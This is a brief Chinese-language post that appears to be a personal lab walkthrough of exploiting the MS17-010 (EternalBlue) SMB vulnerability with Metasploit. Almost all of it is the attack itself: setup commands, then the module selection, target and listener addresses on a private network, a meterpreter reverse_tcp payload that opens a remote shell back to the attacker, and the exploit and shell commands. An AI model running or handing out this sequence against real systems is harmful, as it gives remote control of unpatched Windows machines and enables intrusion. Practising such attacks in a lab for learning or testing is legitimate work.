瞎搞的一次ms17-0100漏洞利用

MS17-010

前提条件:

gem install ruby_smb
—-ruby_smb模块安装
msfupdate
—-msf的更新
msfconsole -qx “use
exploit/windows/smb/ms17_010_eternalblue”

—-启动并加载模块


部署环境:


开始攻击:

  • msfconsole
  • use exploit/windows/smb/ms17_010_eternalblue
  • set rhost 192.168.21.128
  • set lhost 192.168.21.131
  • set payload windows/x64/meterpreter/reverse_tcp
  • exploit
  • shell